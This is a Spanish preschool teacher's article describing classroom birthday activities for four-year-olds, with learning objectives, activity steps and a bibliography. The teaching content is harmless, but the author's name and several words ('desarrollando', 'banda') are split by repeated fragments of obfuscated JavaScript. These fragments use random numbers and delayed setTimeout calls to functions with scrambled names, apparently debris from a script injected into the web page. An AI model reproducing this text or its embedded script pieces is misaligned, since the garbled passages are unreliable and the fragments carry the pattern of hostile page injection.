CÓMO CELEBRAR LOS CUMPLEAÑOS

Autora: María Fernandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anda Rodríguez Rodríguez

         En este artículo voy a exponer como celebro los cumpleaños de mis alumnos/as del segundo nivel del segundo ciclo de Educación Infantil, es decir, 4 años, en el aula ya que como sabemos es un día especial para ellos. Su finalidad es fomentar y desarrollar en mis alumnos/as su autoestima, haciéndoles sentir que es querido y valorado por su maestra/o y compañeros/as.


 

Desarrollo de la actividad:

         Estas actividades van dirigidas a los alumnos/as del segundo nivel del segundo ciclo de Educación Infantil, es decir, 4 años.

       Vamos a trabajar el área de Conocimiento de si mismo y autonomía personal.


         Se encuentra relacionada con los siguientes Objetivos generales de área:

-         Identificar los propios sentimientos, emociones, necesidades o preferencias y ser capaces de denominarlos, expresarlos y comunicarlos a los demás.

-         Formarse una imagen ajustada y positiva de sí mismo, a través de la interacción con los otros y de la identificación gradual de las propias características, posibilidades y limitaciones, desarrollandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando sentimientos de autoestima y autonomía personal.


Bloque de contenido:

        El cuerpo y la propia imagen. Y dentro de este bloque vamos a trabajar los siguientes contenidos:

-         Sentimientos y emociones propios y de los demás, y su expresión corporal. Los distintos sentimientos (positivos y negativos). La autoconciencia emocional. La empatía.

-         Gusto por manifestar y compartir los estados afectivos propios y respeto hacia los de los demás.

-         Valoración y actitud positiva ante las demostraciones de afecto de los adultos y de los demás iguales.

 

Comienzan las actividades:

        El día de los cumpleaños de un niño/a de Educación Infantil es un día especial. Por ello, ese día va a ser el encargado, es decir, va a realizar todas las funciones que tiene asignado este cargo como son: pasar listas, decir el día de la semana, ver en que día nos encontramos, el mes, la estación, observar el tiempo atmosférico, repartir el material, mantener la clase en orden…

        En la asamblea repartirá las invitaciones a sus compañeros/as de clase y nos contará como va a celebrar este día tan especial para él/ella, qué familiares van a ir a su casa, que le tiene preparado a sus compañeros/as,…

         Cada compañero/a del aula realiza un dibujo para regalárselo, cada dibujo llevará puesto su nombre. El niño/a que ha hecho los cumpleaños será el encargado de realizar la portada que pondrá “REGALO DE MIS COMPAÑEROS”, ya que con todos los dibujos vamos a realizar un pequeño libro.

         Yo también le realizaré una bandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anda. Cada niño/a del aula escribirá su nombre. El niño/a que ha hecho los años la decorará como quiera. Saldrá al recreo con la bandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anda puesta para que todos los niños/as del centro sepan que hoy es su cumpleaños y así puedan felicitarlo.

         La mamá del niño/a que ha cumplido años llevará al aula una tarta. El niño/a colocará en la tarta tantas velas como años cumpla. Se colocarán todos los niños/as junto a la carta y les realizaré unas fotos. Seguidamente le cantaremos cumpleaños feliz. Para comernos la tarta el niño/a repartirá platos, tenedores, servilletas y vasos, para ello contara cuantos niños/as hay en el aula y en función del número de niños/as cogerá un número de platos, tenedores, servilletas y vasos. Seguidamente partiré la tarta y la repartirá a sus compañeros/as. Además, llevará un trozo de tarta a las maestras/os de Educación Infantil.


        Al día siguiente, nos explicará en la asamblea como ha pasado el día de su cumpleaños y qué le han regalado.

 

Bibliografía:

  • -         Zabalza, M.A. Didáctica de la Educación Infantil. Ed. Narcea S.A. Madrid, 1987
  • -         Piaget, J. y Inchelder, B.: La psicología del niño. Editorial Morata. Madrid, 1984.
  • -         Lowenfeld, Víctor y Brittain, W. Desarrollo de la capacidad creadora.

 

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